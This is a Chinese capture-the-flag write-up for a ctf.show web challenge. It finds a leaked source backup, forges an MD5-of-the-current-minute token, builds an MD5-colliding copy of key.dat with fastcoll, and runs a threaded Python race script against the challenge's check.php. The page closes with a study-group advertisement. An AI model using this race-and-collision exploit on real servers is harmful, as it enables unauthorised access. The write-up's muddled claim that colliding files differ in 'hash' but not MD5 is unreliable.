CTF show Web 红包题第六弹

提示

1.不是SQL注入 2.需要找关键源码

思路

进入页面发现是一个登录框,很难让人不联想到SQL注入,但提示都说了不是SQL注入,所以就不往这方面想了

先查看一下网页源码,发现一段JavaScript代码,有一个关键类ctfshow

其关键位置在oReq.open这里,显示的是以POST方法,请求check.php页面,并且传入值token=变量token然后接上php://input

直接访问check.php页面,可以看到一个Josn页面,我们直接按照页面源码中的提示来访问一下

提示md5 error

然后利用目录扫描工具,扫一下网站,看看有什么东西

发现扫到了一千多条东西,太多了一个一个看得看到啥时候

直接导出,然后在notepad++中查看,查找一下需要的后缀名

发现挺多zip文件的,但有很多一看就不是关键信息的就没管,剩下的一个一个试,发现web.zip可以下载,其他的都是闪一下就没了,啥也没下

打开web.zip,发现里面有一个check.php.bak的文件,这明显就是check.php页面的备份文件,打开这个文件看一下

对源码分析:

先进行if判断,也就是我们输入的token需要和md5(date("i")相同

  • md5不用说,date("i")就是获得当前的分钟

    • 扩展一下,date("m")就是获得当前的月
    • date("d")是获得当前的日
    • date("h")获得当前的小时
    • date("s")获得当前的秒

所以我们输入的token就是需要是当前的分钟进行md5加密

接着往下分析,看到了$receiveFile变量接收了一个字符串flag.dat,然后被传入了receiveStreamFile方法中

receiveStreamFile方法中会先进行判断,判断$GLOBALS['HTTP_RAW_POST_DATA']是否为空

优先从GLOBALS\['HTTP_RAW_POST_DATA'\]​ 获取原始数据,如果为空,那么就利用php://input​流获取POST数据,然后将数据写入receiveFile指定的文件,也就是flag.dat

然后返回值,进行if判断,我们写入的文件和服务器存放发文件key.dat的md5值需要一样,但哈希值不需要一样,总所周知,可以利用工具制造一个md5一样的文件,但哈希都是独一无二的,所以就可以很轻松过了这个检测

在源码中,我们也是知道了有一个ket.dat文件直接访问这个文件进行下载,然后我将下载的key放入了先前解压的web.zip文件夹中了

然后就是利用我刚才说的工具,生成一个md5相同的文件,直接点着key.dat拖向fastcoll_v1.0.0.5.exe就生成了两个key_msg文件,这两个文件的md5是一样的

Exp

然后编写脚本

python 复制代码
import requests
import datetime
import threading
import hashlib

t = datetime.datetime.now().minute			#获取当前分钟
token = hashlib.md5(str(t).encode()).hexdigest()			#将获取的分钟进行md5加密
re = ''			#设置全局变量,用于接收返回的页面源码
url = "http://728a1bb2-c338-43b9-9c52-5df4302818b3.challenge.ctf.show/"
def szRequest(url, flag):
    url = f"{url}check.php?token={token}&php://input"
    global re
    s = requests.post(url, data=flag)		#利用POST请求,请求数据就是传入的key和data
    re = s.text

with open('key.dat', 'rb') as f:				#读取下载的key
    key = f.read()
with open('key_msg1.dat', 'rb') as fi:			#读取利用工具生成的文件,生成的文件1或文件2都可以
    data = fi.read()
while True:
    threading.Thread(target=szRequest, args=(url, key)).start()			#python中的多线程模块
    threading.Thread(target=szRequest, args=(url, data)).start()		#threading.Thread()创建线程对象,target=szRequest,指定当前线程要执行的函数,args=(url, data)是执行函数传入的参数,.start()是开始执行
    if "ctfshow" in re:			
        print(re)			#如果返回的页面源码中有ctfshow字符串,就打印并退出
        break

运行结果:


最后多说一句

真正想进步的你,其实只缺一个东西:一份别人实践过、你能直接借鉴的内容体系。

我分享的这个学习圈,里面不仅有上千份SRC报告、漏洞复盘材料 ,还有2个T的各类 学习资料,漏洞靶场,网课资源和常见面试题资料包

有了方向,有了范例,才有可能走得更快。

欢迎各位师傅加入知识大陆的帮会,我们一起进步,共同学习

加入帮会-发现更有料的网安圈

相关推荐
安全系统学习5 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
2501_915921438 小时前
iOS IPA 混淆实测分析:从逆向视角验证加固效果与防护流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915918418 小时前
打造可观测的 iOS CICD 流程:调试、追踪与质量保障全记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
聚铭网络9 小时前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全
GLAB-Mary10 小时前
AI会取代网络工程师吗?理解AI在网络安全中的角色
网络·人工智能·web安全
样子201810 小时前
Vue3 之dialog弹框简单制作
前端·javascript·vue.js·前端框架·ecmascript
2501_9159090611 小时前
调试 WebView 旧资源缓存问题:一次从偶发到复现的实战经历
websocket·网络协议·tcp/ip·http·网络安全·https·udp
galaxylove13 小时前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全
2501_9159214314 小时前
请求未达服务端?iOS端HTTPS链路异常的多工具抓包排查记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
weixin_4046113416 小时前
关于微前端框架micro,子应用设置--el-primary-color失效的问题
前端框架